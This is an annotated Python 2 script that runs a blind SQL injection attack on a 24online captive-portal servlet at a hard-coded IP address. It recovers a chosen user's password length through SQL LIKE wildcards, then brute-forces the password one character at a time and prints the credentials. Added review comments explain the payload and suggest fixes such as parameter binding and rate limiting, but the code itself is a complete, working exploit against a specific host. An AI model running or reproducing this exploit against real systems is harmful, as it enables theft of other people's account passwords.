- #!/usr/bin/python
- import sys
- import urllib2
- import xmltodict
# Take the account name to probe from the first command-line argument; if that
# raises anything at all (the bare except is not limited to a missing
# argument), ask for it on the console instead. raw_input is Python 2 only.
- try:
- username = sys.argv[1];
- except:
- username = raw_input("Enter username: ");
# getURL(guess, username): build and return, as a string, the GET URL for one
# probe of the AjaxManager servlet (mode=2000) on the hard-coded host.
#
# The `password` query parameter is `guess` followed by the percent-encoded
# text  ' and ((username Like '<username>') ) ); --  (%27 is a single quote,
# %20 a space). That tail is SQL syntax, so the request only has an effect if
# the server pastes the parameter into the text of a SQL statement.
# Defensive reading: binding the password as a statement parameter instead of
# concatenating it makes the quote and the trailing comment marker inert, and
# a password value containing %27 or ending in -- is a simple signature to
# alert on in the portal's access logs. The scheme is plain http.
- def getURL(guess, username):
- urlstring = "http://1.186.15.77/24online/servlet/AjaxManager?mode=2000&nasip=1.186.15.74&password=" + guess + "%27%20and%20((username%20Like%20%27" + username + "%27)%20)%20);%20--"
- return urlstring;
# Candidate characters, tried left to right for each password position by
# getPassword.
- characters = "abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ!@$%^&*_+?><,.;"
# getPasswordLength(username): return how many '_' characters the guess held
# when the servlet first answered with a <returnstatus> other than '-1'.
# The guess starts as a single '_' and gains one more after every '-1' reply.
# NOTE(review): '_' is the single-character wildcard of SQL LIKE, so this
# presumably depends on the server comparing the password with LIKE; the
# server-side query is not visible here - confirm.
# NOTE(review): indentation was lost in this listing, so the nesting of the
# last three lines is inferred; `done = True` follows the return and looks
# unreachable.
- def getPasswordLength(username):
- guessString = "_"
- done = False;
- while not done:
- urlstring = getURL(guessString, username);
# One HTTP request per candidate length; network and XML-parse errors are not
# caught in this function.
- webresp = urllib2.urlopen(urlstring);
- xmldata = webresp.read();
- resp = xmltodict.parse(xmldata);
- rstatus = resp['response']['returnstatus'];
# '-1' is treated as "no match": lengthen the guess and ask again.
- if (rstatus == '-1'):
- guessString += "_"
- else:
- return len(guessString);
- done = True;
- pass
# getPassword(username): print and return the string "\n<username>, <password>\n".
#
# It asks getPasswordLength for the length, fills a list with that many '_'
# placeholders, then works through the positions in order: each candidate from
# `characters` is written into the current position, the joined guess is sent
# through getURL, and a <returnstatus> of '0' moves on to the next position.
#
# Defensive reading: from the server side a run is a burst of near-identical
# GETs to one servlet for one username, each differing by a single character
# in the password value. Per-client or per-username rate limiting on the
# endpoint slows that down; the underlying fix is to stop building the SQL
# statement from the request parameter.
# NOTE(review): indentation was lost in this listing, so the nesting described
# here (for example, that the "Length" print runs once, after the fill loop)
# is inferred rather than shown.
- def getPassword(username):
- length = getPasswordLength(username);
- glen = 0
- guessstr = []
- for i in range(0, length):
- guessstr.append('_');
- print("Length = " + str(length));
- while glen < length:
- matchc = False;
- index = 0;
- while not matchc:
- guessstr[glen] = characters[index];
- guessString = "".join(guessstr);
- urlstring = getURL(guessString, username);
- webresp = urllib2.urlopen(urlstring);
- xmldata = webresp.read();
- resp = xmltodict.parse(xmldata);
- rstatus = resp['response']['returnstatus'];
- if (rstatus == '0'):
# On a match the servlet's reply itself carries a <password> element, which is
# what gets printed. NOTE(review): an endpoint should never return a stored
# credential, and this suggests passwords are not kept as one-way hashes -
# confirm on the server side.
- pguess = resp['response']['password'];
- print(pguess[0:length])
- glen += 1;
- break;
- index += 1;
- if (index == len(characters)):
- break;
- pass
- pass
# guessString is already a str here, so the join leaves it unchanged.
- password = "".join(guessString);
- returnstring = "\n" + str(username) + ", " + str(password) + "\n";
- print(returnstring);
- return returnstring;
- # TO-DO: Add 'OR' SQL injection to check if username exists or not
# Script entry point: run the lookup for the username chosen at the top of the
# file. The return value is discarded; getPassword has already printed it.
- getPassword(username);